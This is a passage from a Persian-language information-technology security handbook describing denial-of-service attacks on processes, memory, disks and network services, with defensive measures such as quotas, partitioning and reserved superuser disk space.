‫ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺭﺍ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ‬
‫ﻛﻨﻨﺪ‪) .‬ﻫﺮﭼﻨﺪ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﻣﻜﺎﻥ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺍﺩﻩﺍﻳﺪ ﻛﻪ ﺍﻳﻦ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻼﺕ ﺩﻳﮕﺮﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪(.‬‬

‫ﻣﺸﻜﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﭘﺮﺩﺍﺯﻩﻫﺎ‪ ،‬ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ‪ ،‬ﻭ ﺣﺎﻓﻈﻪ‬


‫ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﺗﻬﺎﺟﻢ ﭘﺮﺩﺍﺯﻩﺍﻱ‪ ٣٠٥‬ﺍﺳﺖ‪ .‬ﺩﺭ ﻳﻚ ﺗﻬﺎﺟﻢ ﭘﺮﺩﺍﺯﻩﺍﻱ‪ ،‬ﻣﻬﺎﺟﻢ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﻛﻪ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺍﺯ ﺧﺪﻣﺎﺕ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻧﻮﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﭘﺮﺩﺍﺯﻩﺍﻱ‬
‫ﺯﻣﺎﻧﻲ ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﻳﺠﺎﺩ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺯﻳﺎﺩ‪ ،‬ﺗﻤﺎﻡ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺩﻳﺴﻚ ﻳﺎ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﺭﺍ ﻣﻲﮔﻴﺮﺩ؛ ﻭ ﻧﻮﻋﻲ ﺩﻳﮕﺮ ﻧﻴﺰ‬
‫ﺩﺭﺻﻮﺭﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺗﻤﺎﻡ ﺣﺎﻓﻈﺔ )ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﺠﺎﺯﻱ( ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺷﻐﺎﻝ ﻣﻲﻛﻨﺪ‪ .‬ﮔﺎﻩ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ "ﺑﺎﻛﺘﺮﻱ" ﻳﺎ‬

‫‪303 Destructive Attacks‬‬


‫‪304 Overload Attacks‬‬
‫‪305 Process Attack‬‬
‫‪٤١١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫"ﺧﺮﮔﻮﺵ" ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ؛ ﭼﻮﻥ ﺗﻮﻟﻴﺪ ﻣﺜﻞ ﺁﻧﻬﺎ ﺳﺮﻋﺖ ﺑﺴﻴﺎﺭ ﺑﺎﻻﻳﻲ ﺩﺍﺭﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻳﻦ ﺣﻤﻼﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ‬
‫ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﻣﻮﺿﻮﻋﻴﺖ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺩﺵ ﺭﺍ ﺑﻴﺶ ﺍﺯ ﻇﺮﻓﻴﺖ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻛﻨﺪ‪ ،‬ﺗﺎ ﻭﻗﺘﻲ ﻗﺮﺍﺭ ﻧﻴﺴﺖ‬
‫‪٣٠٦‬‬
‫ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﭼﻨﺪﺍﻥ ﻣﻬﻢ ﻧﻴﺴﺖ‪.‬‬
‫ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﻣﺸﻜﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ‪ ،‬ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻋﺎﺩﻻﻧﺔ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﻣﻨﺎﺑﻊ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺮﺩﺍﺯﺵ ﺑﺎﻻ ﻫﺴﺘﻨﺪ ﻭ ﺷﻤﺎ ﻫﻢ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫ﺗﻮﺯﻳﻊﺷﺪﺓ ﺯﻣﺎﻧﺒﻨﺪﻱ ﻭﻇﺎﻳﻒ‪ ٣٠٧‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﻣﺤﺪﻭﺩﻳﺘﻬﺎ ﻭ ‪quota‬ﻫﺎ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺁﻧﻬﺎ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﻣﻔﻴﺪ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﺣﻤﻼﺕ ﺑﻪ ﺩﻳﺴﻜﻬﺎ‬
‫ﻳﻚ ﺭﺍﻩ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻏﻠﺒﻪ ﺑﺮ ﻳﻚ ﺳﻴﺴﺘﻢ‪ ،‬ﭘﺮ ﻛﺮﺩﻥ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﻳﺴﻚ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﻤﺎﻡ ﺩﻳﺴﻚ ﺭﺍ ﭘﺮ ﻛﻨﺪ‪ ،‬ﺍﺯ ﺁﻥ‬
‫ﭘﺲ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﺩﺭ ﺑﻪ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺟﺪﻳﺪ ﻭ ﺑﻌﺒﺎﺭﺗﻲ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻔﻴﺪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻛﺎﺭﺑﺮ ﺑﻪ‬
‫ﺍﺷﺘﺒﺎﻩ ﺍﻗﺪﺍﻡ ﺑﻪ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺘﻌﺪﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﻇﺮﻓﻴﺖ ﺩﻳﺴﻚ ﺑﻄﻮﺭ ﻧﺎﮔﻬﺎﻧﻲ ﭘﺮ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺩﺭ ﻣﻮﺍﻗﻊ ﺩﻳﮕﺮ ﺑﺎ ﺯﻳﺎﺩ ﺷﺪﻥ ﺗﺪﺭﻳﺠﻲ ﻓﻀﺎﻱ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺩﻳﺴﻜﻬﺎ ﺑﻪ ﻣﺮﻭﺭ ﭘﺮ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻛﺜﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻣﺪﻳﺮﺍﻥ ﺩﺭ ﻛﻨﺘﺮﻝ ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺩﺭ ﺍﺗﺨﺎﺫ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ‬
‫ﭘﺎﻙ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﺑﻴﺸﺘﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻚ ﺭﺍﻩ ﻣﺆﺛﺮ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﺩﻳﺴﻜﻲ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻭﻳﮋﮔﻲ ‪ quota‬ﺑﺮﺍﻱ ﺩﻳﺴﻚ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺖ )ﻣﻌﻤﻮ ﹰﻻ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Posix‬ﻭﺍﺟﺪ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﻫﺴﺘﻨﺪ(‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﻣﻲﺗﻮﺍﻥ ﻫﺮ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﺴﻚ ﻣﺤﺪﻭﺩ ﻛﺮﺩ‪ .‬ﺩﺭ ﻫﺮ ‪ partition‬ﻳﺎ ﺳﻴﺴﺘ ﹺﻢ ﻓﺎﻳﻞ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺩﻳﺴﻚ‬
‫‪ qouta‬ﻣﺸﺨﺺ ﺷﻮﺩ‪ .‬ﺩﺭ ﺗﺨﺼﻴﺺ ﻓﻀﺎﻱ ﻣﺠﺎﺯ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ‪partition‬ﻫﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺫﺧﻴﺮﺓ ﻧﺎﻣﻪﻫﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﻓﻀﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺖ ﭘﺮﺩﺍﺯﺷﻬﺎ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻔﻜﻴﻚ ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﻪ ﭼﻨﺪ ‪ partition‬ﻛﻮﭼﻜﺘﺮ ﻭ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺷﺎﺧﻪﻫﺎﻱ ‪ home‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﺨﺘﻠﻒ ﺩﺭ‬
‫‪partition‬ﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ‪ ،‬ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻼﺕ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﻳﻚ ‪ partition‬ﺭﺍ ﺑﻄﻮﺭ‬
‫ﻛﺎﻣﻞ ﺍﺷﻐﺎﻝ ﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﺮ ﺗﺄﺛﻴﺮﻱ ﺑﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺳﺎﻳﺮ ‪partition‬ﻫﺎ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﻳﻜﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺍﻳﻦ ﺷﻴﻮﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ‬
‫ﺷﺎﺧﻪﺍﻱ ﺑﻪ ﻓﻀﺎﻱ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﺑﻪ ‪ partition‬ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﭘﻴﻮﻧﺪ‬
‫ﺳﺨﺖ‪ ٣٠٨‬ﭘﺸﻨﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﻣﻴﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﭼﻨﺪ ﻛﺎﺭﺑﺮ ﻣﺘﻔﺎﻭﺕ ﭘﻴﻮﻧﺪ ﺳﺨﺖ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺧﺪﻣﺎﺗﻲ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺍﺟﺎﺯﺓ ﺍﺷﻐﺎﻝ ﻓﻀﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﺩﻳﺴﻚ ﺭﺍ ﺑﺪﻫﻨﺪ )ﻣﺜ ﹰ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻼ‬
‫ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ‪ FTP‬ﺑﺎ ﺗﻮﺍﻧﺎﻳﻲ ‪ upload‬ﮔﻤﻨﺎﻡ(‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺠﺰﺍﻳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﺩﺭ ﻣﻌﺮﺽ‬
‫ﺳﺮﺭﻳﺰ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻣﻮﻗﺖ ﺗﻮﺍﻧﺎﻳﻲ ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﻓﺎﻳﻠﻬﺎ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭﺩﻫﻨﺪﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻛﻞ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻏﻴﺮﻗﺎﺑﻞ ﺗﺤﻤﻞ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ‪ -‬ﺑﺨﺼﻮﺹ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ‪ -‬ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﻗﺴﻤﺘﻲ ﺍﺯ ﺩﻳﺴﻚ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺍﺑﺮﻛﺎﺭﺑﺮ‪ ٣٠٩‬ﺭﺯﺭﻭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻭﻳﮋﮔﻲ‪ ،‬ﺍﺑﺮﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﭘﺮ ﺷﺪﻥ ﺩﻳﺴﻚ ﺑﻪ ﺳﻴﺴﺘﻢ‬
‫ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻠﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺣﺎﻟﺖ ﺭﺍ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻓﺎﻳﻞ‬
‫ﺯﺍﺋﺪ ﺑﺰﺭﮒ ﺭﻭﻱ ﺩﻳﺴﻚ ﺷﺒﻴﻪﺳﺎﺯﻱ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﻄﻮﺭ ﻧﺎﮔﻬﺎﻧﻲ ﺑﻪ ﻓﻀﺎﻱ ﺧﺎﻟﻲ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ‪ ،‬ﺁﻧﺮﺍ ﭘﺎﻙ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪ ۳۰۶‬ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﺮﻣﻴﻢ ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﭘﺮﺩﺍﺯﻩﺍﻱ ﺭﺟﻮﻉ ﻛﻨﻴﺪ ﺑﻪ ﺑﺨﺶ ‪ ۲۴‬ﻛﺘﺎﺏ ‪.PUIS‬‬
‫‪307 Distributed Task Scheduling System‬‬
‫‪308 Hard Link‬‬
‫‪309 Superuser‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤١٢‬‬

‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪ‬


‫ﺷﺒﻜﻪﻫﺎ ﻧﻴﺰ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﮕﻮﻧﻪ ﺣﻤﻼﺕ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﺎﻧﻊ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺣﻘﻴﻘﻲ ﻭ ﻣﺠﺎﺯ ﺍﺯ‬
‫ﺷﺒﻜﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺑﻪ ﺍﺷﻜﺎﻝ ﻣﺨﺘﻠﻒ ﻣﻲﺗﻮﺍﻥ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪.‬‬

‫ﺑﺎﺭﮔﺬﺍﺭﻱ ﺳﺮﻭﻳﺲ‬
‫ﻳﻚ ﺳﺮﻭﻳﺲ ﺯﻣﺎﻧﻲ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻛﻪ ﺳﻴﻠﻲ ﺍﺯ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﻳﻚ ‪ daemon‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ‬
‫ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺳﺮﺍﺯﻳﺮ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺳﻴﻞ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻃﺮﻕ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﻪ ﻭﺟﻮﺩ ﺁﻳﺪ؛ ﻫﻢ ﺑﻪ ﺷﻜﻞ ﺗﺼﺎﺩﻓﻲ ﻭ ﻫﻢ ﺑﻪ ﺷﻜﻞ ﻋﻤﺪﻱ‪.‬‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺁﻧﭽﻨﺎﻥ ﻣﺸﻐﻮﻝ ﭘﺮﺩﺍﺯﺵ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻛﻨﺪ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺳﺎﻳﺮ ﻛﺎﺭﻫﺎ ﻃﺒﻖ ﺭﻭﺍﻝ‬
‫ﻋﺎﺩﻱ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺑﺪﻟﻴﻞ ﻋﺪﻡ ﻭﺟﻮﺩ ﻣﺤﻠﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩﺷﺪﻥ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻭﺍﻗﻌﻲ‬
‫ﻣﺠﺪﺩﹰﺍ ﺍﺭﺳﺎﻝ ﻣﻲﮔﺮﺩﻧﺪ ﻭ ﺑﻪ ﺑﺎ ﹺﺭ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺍﻓﺰﺍﻳﻨﺪ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﺑﺎﻋﺚ ﺷﺮﻭﻉ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﺟﺪﻳﺪ ﻣﻲﺷﻮﺩ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪،‬‬
‫ﺳﻴﺴﺘﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ﻛﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﻔﻴﺪ‪ ،‬ﺟﺎﻳﻲ ﺩﺭ ﺟﺪﻭﻝ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ‪ .‬ﺑﻪ‬
‫ﻫﻤﻴﻦ ﺷﻜﻞ‪ ،‬ﺍﻳﻦ ﺣﻤﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺍﺷﻐﺎﻝ ﺑﺨﺶ ﺍﻋﻈﻤﻲ ﺍﺯ ﺣﺎﻓﻈﻪ‪ ،‬ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻳﺎ ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﺗﻮﺳﻂ ﺁﻥ ﺳﺮﻭﻳﺲ ﺷﻮﺩ‪.‬‬
‫ﺑﺎﺭ ﺍﺿﺎﻓﻲ ﻧﺎﺷﻲ ﺍﺯ ﺍﻳﻦ ﺣﻤﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﻧﻬﺎﻳﻲ ﻣﻬﺎﺟﻢ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻳﺎ ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﭘﻨﻬﺎﻥ ﻛﺮﺩﻥ ﺣﻤﻠﻪﺍﻱ ﺩﺭ ﺟﺎﻳﻲ ﺩﻳﮕﺮ‪ .‬ﺑﻌﻨﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺳﺘﮕﺎﻩ ﺛﺒﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻤﻴﺰﻱ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺗﺎ ﺍﺯ ﺛﺒﺖ ﺷﺪﻥ ﺑﻪﻣﻮﻗ ﹺﻊ ﻭﺭﻭﺩ ﻭ ﺧﺮﻭﺝ ﺟﻠﻮﮔﻴﺮﻱ ﺑﻌﻤﻞ ﺁﻭﺭﺩ‪.‬‬
‫ﻼ‬
